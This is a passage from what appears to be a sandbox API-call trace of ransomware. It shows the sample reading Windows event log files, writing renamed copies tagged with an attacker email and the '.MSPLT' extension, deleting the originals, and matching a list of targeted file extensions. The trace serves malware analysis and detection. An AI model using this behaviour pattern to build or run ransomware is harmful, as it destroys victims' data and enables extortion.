lpNumberOfBytesRead=0x371fecc, lpOverlapped=0x0 | out: lpBuffer=0x41d7020*, lpNumberOfBytesRead=0x371fecc*=0x11000, lpOverlapped=0x0) returned 1 [0291.480] WriteFile (in: hFile=0x420, lpBuffer=0x41d7020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x371fc94, lpOverlapped=0x0 | out: lpBuffer=0x41d7020*, lpNumberOfBytesWritten=0x371fc94*=0x11010, lpOverlapped=0x0) returned 1 [0291.483] ReadFile (in: hFile=0x43c, lpBuffer=0x41d7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x371fecc, lpOverlapped=0x0 | out: lpBuffer=0x41d7020*, lpNumberOfBytesRead=0x371fecc*=0x0, lpOverlapped=0x0) returned 1 [0291.483] WriteFile (in: hFile=0x420, lpBuffer=0x41d7020*, nNumberOfBytesToWrite=0x144, lpNumberOfBytesWritten=0x371fc94, lpOverlapped=0x0 | out: lpBuffer=0x41d7020*, lpNumberOfBytesWritten=0x371fc94*=0x144, lpOverlapped=0x0) returned 1 [0291.483] SetEndOfFile (hFile=0x420) returned 1 [0291.483] CloseHandle (hObject=0x420) returned 1 [0291.486] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x371fec0 | out: lpNewFilePointer=0x0) returned 1 [0291.486] SetEndOfFile (hFile=0x43c) returned 1 [0291.488] CloseHandle (hObject=0x43c) returned 1 [0291.488] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x20) returned 1 [0291.488] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-power%4thermal-operational.evtx")) returned 1 [0291.489] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx") returned 64 [0291.489] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx") returned 64 [0291.489] lstrlenW (lpString=".doc") returned 4 [0291.489] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0291.489] lstrlenW (lpString=".docx") returned 5 [0291.489] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0291.489] lstrlenW (lpString=".pdf") returned 4 [0291.489] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0291.489] lstrlenW (lpString=".xls") returned 4 [0291.489] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0291.489] lstrlenW (lpString=".xlsx") returned 5 [0291.489] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0291.489] lstrlenW (lpString=".ppt") returned 4 [0291.489] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0291.489] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx") returned 64 [0291.489] lstrlenW (lpString=".zip") returned 4 [0291.489] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0291.489] lstrlenW (lpString=".rar") returned 4 [0291.489] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0291.489] lstrlenW (lpString=".bz2") returned 4 [0291.489] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0291.489] lstrlenW (lpString=".7z") returned 3 [0291.489] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0291.490] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx") returned 64 [0291.490] lstrlenW (lpString=".dbf") returned 4 [0291.490] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0291.490] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx") returned 64 [0291.490] lstrlenW (lpString=".1cd") returned 4 [0291.490] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0291.490] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx") returned 64 [0291.490] lstrlenW (lpString=".jpg") returned 4 [0291.490] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0291.490] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx") returned 64 [0291.490] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx") returned 64 [0291.490] lstrlenW (lpString=".doc") returned 4 [0291.490] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0291.490] lstrlenW (lpString=".docx") returned 5 [0291.490] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0291.490] lstrlenW (lpString=".pdf") returned 4 [0291.490] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0291.490] lstrlenW (lpString=".xls") returned 4 [0291.490] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0291.490] lstrlenW (lpString=".xlsx") returned 5 [0291.490] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0291.490] lstrlenW (lpString=".ppt") returned 4 [0291.490] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0291.490] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx") returned 64 [0291.490] lstrlenW (lpString=".zip") returned 4 [0291.490] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0291.490] lstrlenW (lpString=".rar") returned 4 [0291.491] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0291.491] lstrlenW (lpString=".bz2") returned 4 [0291.491] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0291.491] lstrlenW (lpString=".7z") returned 3 [0291.491] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0291.491] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx") returned 64 [0291.491] lstrlenW (lpString=".dbf") returned 4 [0291.491] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0291.491] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx") returned 64 [0291.491] lstrlenW (lpString=".1cd") returned 4 [0291.491] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0291.491] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx") returned 64 [0291.491] lstrlenW (lpString=".jpg") returned 4 [0291.491] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0291.491] lstrcmpiW (lpString1=".evtx", lpString2=".MSPLT") returned -1 [0291.491] lstrlenW (lpString="Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx") returned 51 [0291.491] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-storemgr%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x43c [0291.538] GetFileSizeEx (in: hFile=0x43c, lpFileSize=0x371ff14 | out: lpFileSize=0x371ff14*=69632) returned 1 [0291.539] CloseHandle (hObject=0x43c) returned 1 [0291.539] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-storemgr%4operational.evtx")) returned 0x20 [0291.539] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\logs\\microsoft-windows-kernel-storemgr%4operational.evtx.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0291.539] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-storemgr%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x43c [0291.539] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x371fec0 | out: lpNewFilePointer=0x0) returned 1 [0291.539] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x371fec0 | out: lpNewFilePointer=0x0) returned 1 [0291.539] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\logs\\microsoft-windows-kernel-storemgr%4operational.evtx.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x420 [0291.549] GetLastError () returned 0x0 [0291.549] ReadFile (in: hFile=0x43c, lpBuffer=0x41d7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x371fecc, lpOverlapped=0x0 | out: lpBuffer=0x41d7020*, lpNumberOfBytesRead=0x371fecc*=0x11000, lpOverlapped=0x0) returned 1 [0291.745] WriteFile (in: hFile=0x420, lpBuffer=0x41d7020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x371fc94, lpOverlapped=0x0 | out: lpBuffer=0x41d7020*, lpNumberOfBytesWritten=0x371fc94*=0x11010, lpOverlapped=0x0) returned 1 [0291.748] ReadFile (in: hFile=0x43c, lpBuffer=0x41d7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x371fecc, lpOverlapped=0x0 | out: lpBuffer=0x41d7020*, lpNumberOfBytesRead=0x371fecc*=0x0, lpOverlapped=0x0) returned 1 [0291.748] WriteFile (in: hFile=0x420, lpBuffer=0x41d7020*, nNumberOfBytesToWrite=0x13a, lpNumberOfBytesWritten=0x371fc94, lpOverlapped=0x0 | out: lpBuffer=0x41d7020*, lpNumberOfBytesWritten=0x371fc94*=0x13a, lpOverlapped=0x0) returned 1 [0291.748] SetEndOfFile (hFile=0x420) returned 1 [0291.766] CloseHandle (hObject=0x420) returned 1 [0291.784] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x371fec0 | out: lpNewFilePointer=0x0) returned 1 [0291.784] SetEndOfFile (hFile=0x43c) returned 1 [0291.808] CloseHandle (hObject=0x43c) returned 1 [0291.821] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x20) returned 1 [0291.821] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-storemgr%4operational.evtx")) returned 1 [0291.823] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx") returned 59 [0291.823] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx") returned 59 [0291.823] lstrlenW (lpString=".doc") returned 4 [0291.823] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0291.824] lstrlenW (lpString=".docx") returned 5 [0291.824] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0291.824] lstrlenW (lpString=".pdf") returned 4 [0291.824] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0291.824] lstrlenW (lpString=".xls") returned 4 [0291.824] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0291.824] lstrlenW (lpString=".xlsx") returned 5 [0291.824] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0291.824] lstrlenW (lpString=".ppt") returned 4 [0291.824] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0291.824] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx") returned 59 [0291.824] lstrlenW (lpString=".zip") returned 4 [0291.824] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0291.824] lstrlenW (lpString=".rar") returned 4 [0291.824] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0291.824] lstrlenW (lpString=".bz2") returned 4 [0291.824] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0291.824] lstrlenW (lpString=".7z") returned 3 [0291.824] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0291.824] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx") returned 59 [0291.824] lstrlenW (lpString=".dbf") returned 4 [0291.824] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0291.824] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx") returned 59 [0291.824] lstrlenW (lpString=".1cd") returned 4 [0291.824] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0291.824] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx") returned 59 [0291.825] lstrlenW (lpString=".jpg") returned 4 [0291.825] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0291.825] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx") returned 59 [0291.825] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx") returned 59 [0291.825] lstrlenW (lpString=".doc") returned 4 [0291.825] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0291.825] lstrlenW (lpString=".docx") returned 5 [0291.825] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0291.825] lstrlenW (lpString=".pdf") returned 4 [0291.825] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0291.825] lstrlenW (lpString=".xls") returned 4 [0291.825] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0291.825] lstrlenW (lpString=".xlsx") returned 5 [0291.825] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0291.825] lstrlenW (lpString=".ppt") returned 4 [0291.826] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0291.826] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx") returned 59 [0291.826] lstrlenW (lpString=".zip") returned 4 [0291.826] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0291.826] lstrlenW (lpString=".rar") returned 4 [0291.826] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0291.826] lstrlenW (lpString=".bz2") returned 4 [0291.826] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0291.826] lstrlenW (lpString=".7z") returned 3 [0291.826] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0291.826] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx") returned 59 [0291.826] lstrlenW (lpString=".dbf") returned 4 [0291.826] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0291.826] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx") returned 59 [0291.826] lstrlenW (lpString=".1cd") returned 4 [0291.826] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0291.826] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx") returned 59 [0291.826] lstrlenW (lpString=".jpg") returned 4 [0291.826] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0291.827] lstrcmpiW (lpString1=".evtx", lpString2=".MSPLT") returned -1 [0291.827] lstrlenW (lpString="Microsoft-Windows-LiveId%4Operational.evtx") returned 42 [0291.827] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-LiveId%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-liveid%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x43c [0291.829] GetFileSizeEx (in: hFile=0x43c, lpFileSize=0x371ff14 | out: lpFileSize=0x371ff14*=69632) returned 1 [0291.829] CloseHandle (hObject=0x43c) returned 1 [0291.829] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-LiveId%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-liveid%4operational.evtx")) returned 0x20 [0291.829] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-LiveId%4Operational.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\logs\\microsoft-windows-liveid%4operational.evtx.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0291.844] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-LiveId%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-liveid%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x440 [0291.844] SetFilePointerEx (in: hFile=0x440, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x371fec0 | out: lpNewFilePointer=0x0) returned 1 [0291.844] SetFilePointerEx (in: hFile=0x440, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x371fec0 | out: lpNewFilePointer=0x0) returned 1 [0291.844] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-LiveId%4Operational.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\logs\\microsoft-windows-liveid%4operational.evtx.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x450 [0291.874] GetLastError () returned 0x0 [0291.874] ReadFile (in: hFile=0x440, lpBuffer=0x41d7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x371fecc, lpOverlapped=0x0 | out: lpBuffer=0x41d7020*, lpNumberOfBytesRead=0x371fecc*=0x11000, lpOverlapped=0x0) returned 1 [0291.880] WriteFile (in: hFile=0x450, lpBuffer=0x41d7020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x371fc94, lpOverlapped=0x0 | out: lpBuffer=0x41d7020*, lpNumberOfBytesWritten=0x371fc94*=0x11010, lpOverlapped=0x0) returned 1 [0291.882] ReadFile (in: hFile=0x440, lpBuffer=0x41d7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x371fecc, lpOverlapped=0x0 | out: lpBuffer=0x41d7020*, lpNumberOfBytesRead=0x371fecc*=0x0, lpOverlapped=0x0) returned 1 [0291.883] WriteFile (in: hFile=0x450, lpBuffer=0x41d7020*, nNumberOfBytesToWrite=0x128, lpNumberOfBytesWritten=0x371fc94, lpOverlapped=0x0 | out: lpBuffer=0x41d7020*, lpNumberOfBytesWritten=0x371fc94*=0x128, lpOverlapped=0x0) returned 1 [0291.883] SetEndOfFile (hFile=0x450) returned 1 [0291.883] CloseHandle (hObject=0x450) returned 1 [0291.889] SetFilePointerEx (in: hFile=0x440, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x371fec0 | out: lpNewFilePointer=0x0) returned 1 [0291.889] SetEndOfFile (hFile=0x440) returned 1 [0291.890] CloseHandle (hObject=0x440) returned 1 [0291.890] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-LiveId%4Operational.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x20) returned 1 [0291.891] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-LiveId%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-liveid%4operational.evtx")) returned 1 [0291.891] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-LiveId%4Operational.evtx") returned 50 [0291.891] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-LiveId%4Operational.evtx") returned 50 [0291.891] lstrlenW (lpString=".doc") returned 4 [0291.891] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0291.891] lstrlenW (lpString=".docx") returned 5 [0291.891] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0291.891] lstrlenW (lpString=".pdf") returned 4 [0291.891] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0291.891] lstrlenW (lpString=".xls") returned 4 [0291.891] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0291.891] lstrlenW (lpString=".xlsx") returned 5 [0291.891] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0291.891] lstrlenW (lpString=".ppt") returned 4 [0291.891] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0291.891] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-LiveId%4Operational.evtx") returned 50 [0291.891] lstrlenW (lpString=".zip") returned 4 [0291.891] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0291.891] lstrlenW (lpString=".rar") returned 4 [0291.891] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0291.892] lstrlenW (lpString=".bz2") returned 4 [0291.892] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0291.892] lstrlenW (lpString=".7z") returned 3 [0291.892] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0291.892] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-LiveId%4Operational.evtx") returned 50 [0291.892] lstrlenW (lpString=".dbf") returned 4 [0291.892] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0291.892] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-LiveId%4Operational.evtx") returned 50 [0291.892] lstrlenW (lpString=".1cd") returned 4 [0291.892] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0291.892] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-LiveId%4Operational.evtx") returned 50 [0291.892] lstrlenW (lpString=".jpg") returned 4 [0291.892] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0291.892] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-LiveId%4Operational.evtx") returned 50 [0291.892] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-LiveId%4Operational.evtx") returned 50 [0291.892] lstrlenW (lpString=".doc") returned 4 [0291.892] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0291.892] lstrlenW (lpString=".docx") returned 5 [0291.892] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0291.892] lstrlenW (lpString=".pdf") returned 4 [0291.892] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0291.892] lstrlenW (lpString=".xls") returned 4 [0291.892] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0291.892] lstrlenW (lpString=".xlsx") returned 5 [0291.892] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0291.892] lstrlenW (lpString=".ppt") returned 4 [0291.892] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0291.892] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-LiveId%4Operational.evtx") returned 50 [0291.892] lstrlenW (lpString=".zip") returned 4 [0291.892] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0291.892] lstrlenW (lpString=".rar") returned 4 [0291.892] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0291.892] lstrlenW (lpString=".bz2") returned 4 [0291.892] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0291.893] lstrlenW (lpString=".7z") returned 3 [0291.893] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0291.893] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-LiveId%4Operational.evtx") returned 50 [0291.893] lstrlenW (lpString=".dbf") returned 4 [0291.893] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0291.893] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-LiveId%4Operational.evtx") returned 50 [0291.893] lstrlenW (lpString=".1cd") returned 4 [0291.893] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0291.893] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-LiveId%4Operational.evtx") returned 50 [0291.893] lstrlenW (lpString=".jpg") returned 4 [0291.893] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0291.893] lstrcmpiW (lpString1=".evtx", lpString2=".MSPLT") returned -1 [0291.893] lstrlenW (lpString="Microsoft-Windows-MUI%4Admin.evtx") returned 33 [0291.893] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-MUI%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-mui%4admin.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x454 [0292.128] GetFileSizeEx (in: hFile=0x454, lpFileSize=0x371ff14 | out: lpFileSize=0x371ff14*=69632) returned 1 [0292.128] CloseHandle (hObject=0x454) returned 1 [0292.128] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-MUI%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-mui%4admin.evtx")) returned 0x20 [0292.128] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-MUI%4Admin.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\logs\\microsoft-windows-mui%4admin.evtx.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0292.495] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-MUI%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-mui%4admin.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0292.495] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x371fec0 | out: lpNewFilePointer=0x0) returned 1 [0292.495] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x371fec0 | out: lpNewFilePointer=0x0) returned 1 [0292.495] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-MUI%4Admin.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\logs\\microsoft-windows-mui%4admin.evtx.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x464 [0292.497] GetLastError () returned 0x0 [0292.497] ReadFile (in: hFile=0x37c, lpBuffer=0x41d7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x371fecc, lpOverlapped=0x0 | out: lpBuffer=0x41d7020*, lpNumberOfBytesRead=0x371fecc*=0x11000, lpOverlapped=0x0) returned 1 [0292.615] WriteFile (in: hFile=0x464, lpBuffer=0x41d7020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x371fc94, lpOverlapped=0x0 | out: lpBuffer=0x41d7020*, lpNumberOfBytesWritten=0x371fc94*=0x11010, lpOverlapped=0x0) returned 1 [0292.618] ReadFile (in: hFile=0x37c, lpBuffer=0x41d7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x371fecc, lpOverlapped=0x0 | out: lpBuffer=0x41d7020*, lpNumberOfBytesRead=0x371fecc*=0x0, lpOverlapped=0x0) returned 1 [0292.618] WriteFile (in: hFile=0x464, lpBuffer=0x41d7020*, nNumberOfBytesToWrite=0x116, lpNumberOfBytesWritten=0x371fc94, lpOverlapped=0x0 | out: lpBuffer=0x41d7020*, lpNumberOfBytesWritten=0x371fc94*=0x116, lpOverlapped=0x0) returned 1 [0292.618] SetEndOfFile (hFile=0x464) returned 1 [0292.640] CloseHandle (hObject=0x464) returned 1 [0292.949] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x371fec0 | out: lpNewFilePointer=0x0) returned 1 [0292.949] SetEndOfFile (hFile=0x37c) returned 1 [0292.951] CloseHandle (hObject=0x37c) returned 1 [0292.951] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-MUI%4Admin.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x20) returned 1 [0292.951] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-MUI%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-mui%4admin.evtx")) returned 1 [0292.951] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-MUI%4Admin.evtx") returned 41 [0292.952] lstrlenW 